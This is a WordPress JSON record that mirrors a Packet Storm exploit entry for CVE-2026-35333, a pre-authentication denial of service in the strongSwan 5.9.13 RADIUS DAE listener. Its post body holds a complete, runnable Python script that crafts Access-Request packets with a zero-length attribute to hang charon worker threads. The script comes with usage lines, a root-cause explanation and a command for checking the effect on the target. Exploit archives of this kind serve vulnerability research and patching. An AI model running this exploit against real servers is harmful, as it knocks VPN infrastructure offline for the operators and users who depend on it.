{"id":58263,"date":"2026-05-29T11:39:10","date_gmt":"2026-05-29T11:39:10","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=58263"},"modified":"2026-05-29T11:39:10","modified_gmt":"2026-05-29T11:39:10","slug":"strongswan-5913-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=58263","title":{"rendered":"\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-29T16:17:13&#8243;,&#8221;description&#8221;:&#8221;strongSwan version 5.9.13 suffers from a denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 strongSwan 5.9.13 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:222182&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-35333&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: strongSwan 5.9.13 &#8211; DoS\\n    # Date: 2026-05-13\\n    # Exploit Author: Lukas Johannes Moeller\\n    # Vendor Homepage: https:\/\/www.strongswan.org\/\\n    # Software Link: https:\/\/download.strongswan.org\/strongswan-5.9.13.tar.bz2\\n    # Version: strongSwan \\u003c= 5.9.13 (eap-radius plugin built with DAE enabled)\\n    # Tested on: Debian 12 bookworm, charon 5.9.13 built from upstream tarball,\\n    #            strongswan.conf charon.plugins.eap-radius.dae.enable = yes,\\n    #            listener bound on UDP\/3799\\n    # CVE: CVE-2026-35333\\n    # References:\\n    #   https:\/\/github.com\/strongswan\/strongswan\/commit\/e067d24293\\n    #   https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-35333\\n    #   https:\/\/github.com\/JohannesLks\/CVE-2026-35333\\n    #\\n    # Description:\\n    #   attribute_enumerate() in src\/libradius\/radius_message.c walks the\\n    #   attribute list of a RADIUS message without rejecting an attribute\\n    #   whose length byte is 0. For length == 0, this-\\u003enext never advances\\n    #   and the per-attribute length computation `this-\\u003enext-\\u003elength -\\n    #   sizeof(rattr_t)` underflows to (size_t)-2. The result is an\\n    #   infinite loop pegging one charon worker thread at 100% CPU.\\n    #\\n    #   The reachability detail that turns this into a pre-auth bug:\\n    #   radius_message_t::verify() uses the SAME broken iterator to find\\n    #   Message-Authenticator BEFORE the Response-Authenticator MD5 check\\n    #   is applied. For RADIUS code 1 (Access-Request) verify() skips the\\n    #   MD5 check entirely. So a malformed Access-Request with a single\\n    #   zero-length attribute as its first attribute traps the worker\\n    #   thread without any knowledge of the DAE shared secret.\\n    #\\n    #   N packets exhaust N worker threads -\\u003e full DAE denial of service.\\n    #\\n    # Usage:\\n    #   python3 strongswan-5.9.13-radius-dae-dos.py &#8211;target 10.0.0.1\\n    #   python3 strongswan-5.9.13-radius-dae-dos.py &#8211;target 10.0.0.1 &#8211;count 8\\n    #\\n    # Observe on the target:\\n    #   ps -L -p $(pidof charon) -o tid,pcpu,stat,wchan:25,cmd\\n    #   -\\u003e one or more threads in state R at ~100% CPU, never returning.\\n    #\\n    # Disclaimer:\\n    #   For authorized testing and defensive research only. Do not use\\n    #   against systems you do not own or have explicit permission to test.\\n    \\n    import argparse\\n    import os\\n    import socket\\n    import struct\\n    import sys\\n    import time\\n    \\n    ACCESS_REQUEST = 1\\n    RAT_USER_NAME  = 1\\n    \\n    \\n    def build_zero_length_attr_packet() -\\u003e bytes:\\n        identifier    = os.urandom(1)[0]\\n        authenticator = os.urandom(16)\\n    \\n        # 20-byte RADIUS header + 2-byte attribute (type=User-Name, length=0)\\n        total_len = 22\\n        header = struct.pack(\\&#8221;!BBH16s\\&#8221;,\\n                             ACCESS_REQUEST,\\n                             identifier,\\n                             total_len,\\n                             authenticator)\\n        attribute = struct.pack(\\&#8221;!BB\\&#8221;, RAT_USER_NAME, 0)\\n        return header + attribute\\n    \\n    \\n    def send_packet(packet: bytes, target: str, port: int, wait: float) -\\u003e None:\\n        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\\n        sock.settimeout(wait)\\n        sock.sendto(packet, (target, port))\\n        print(f\\&#8221;[+] sent {len(packet)} bytes to {target}:{port}\/udp\\&#8221;)\\n        try:\\n            data, addr = sock.recvfrom(4096)\\n            print(f\\&#8221;[-] unexpected response {len(data)} bytes from {addr}:\\&#8221;\\n                  f\\&#8221; {data[:32].hex()}\\&#8221;)\\n        except socket.timeout:\\n            print(f\\&#8221;[+] no response within {wait:.1f}s &#8212; expected for hung worker\\&#8221;)\\n        finally:\\n            sock.close()\\n    \\n    \\n    def main() -\\u003e int:\\n        p = argparse.ArgumentParser(\\n            description=\\&#8221;CVE-2026-35333 strongSwan RADIUS DAE pre-auth DoS\\&#8221;\\n        )\\n        p.add_argument(\\&#8221;&#8211;target\\&#8221;, required=True,\\n                       help=\\&#8221;DAE listener IPv4 address (e.g. 10.0.0.1)\\&#8221;)\\n        p.add_argument(\\&#8221;&#8211;port\\&#8221;, type=int, default=3799,\\n                       help=\\&#8221;DAE listener UDP port (default: 3799)\\&#8221;)\\n        p.add_argument(\\&#8221;&#8211;count\\&#8221;, type=int, default=1,\\n                       help=\\&#8221;Number of crafted packets to send (default: 1)\\&#8221;)\\n        p.add_argument(\\&#8221;&#8211;wait\\&#8221;, type=float, default=2.0,\\n                       help=\\&#8221;Per-packet response timeout in seconds (default: 2.0)\\&#8221;)\\n        args = p.parse_args()\\n    \\n        payload = build_zero_length_attr_packet()\\n        for i in range(args.count):\\n            print(f\\&#8221;\\\\n[*] crafted packet #{i + 1}: Access-Request with \\&#8221;\\n                  \\&#8221;zero-length User-Name attribute\\&#8221;)\\n            send_packet(payload, args.target, args.port, args.wait)\\n            time.sleep(0.2)\\n    \\n        print(\\&#8221;\\\\n[+] done; expected effect: one charon worker thread per packet \\&#8221;\\n              \\&#8221;stuck at 100% CPU.\\&#8221;)\\n        print(\\&#8221;    Verify on the target with:  ps -L -p $(pidof charon) \\&#8221;\\n              \\&#8221;-o tid,pcpu,stat,wchan:25,cmd\\&#8221;)\\n        return 0\\n    \\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        sys.exit(main())&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/222182&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/222182\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-29T16:17:13&#8243;,&#8221;description&#8221;:&#8221;strongSwan version 5.9.13 suffers from a denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 strongSwan 5.9.13 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:222182&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-35333&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: strongSwan 5.9.13 &#8211; DoS\\n # Date: 2026-05-13\\n #&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-58263","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=58263\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-29T16:17:13&#8243;,&#8221;description&#8221;:&#8221;strongSwan version 5.9.13 suffers from a denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 strongSwan 5.9.13 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:222182&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-35333&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: strongSwan 5.9.13 &#8211; DoSn # Date: 2026-05-13n #...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=58263\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-29T11:39:10+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58263#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58263\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182\",\"datePublished\":\"2026-05-29T11:39:10+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58263\"},\"wordCount\":809,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=58263#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58263\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58263\",\"name\":\"\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-29T11:39:10+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58263#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=58263\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58263#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=58263","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-29T16:17:13&#8243;,&#8221;description&#8221;:&#8221;strongSwan version 5.9.13 suffers from a denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 strongSwan 5.9.13 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:222182&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-35333&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: strongSwan 5.9.13 &#8211; DoSn # Date: 2026-05-13n #...","og_url":"https:\/\/zero.redgem.net\/?p=58263","og_site_name":"zero redgem","article_published_time":"2026-05-29T11:39:10+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=58263#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=58263"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182","datePublished":"2026-05-29T11:39:10+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=58263"},"wordCount":809,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=58263#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=58263","url":"https:\/\/zero.redgem.net\/?p=58263","name":"\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-29T11:39:10+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=58263#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=58263"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=58263#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 strongSwan 5.9.13 Denial of Service_PACKETSTORM:222182"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/58263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=58263"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/58263\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=58263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=58263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=58263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}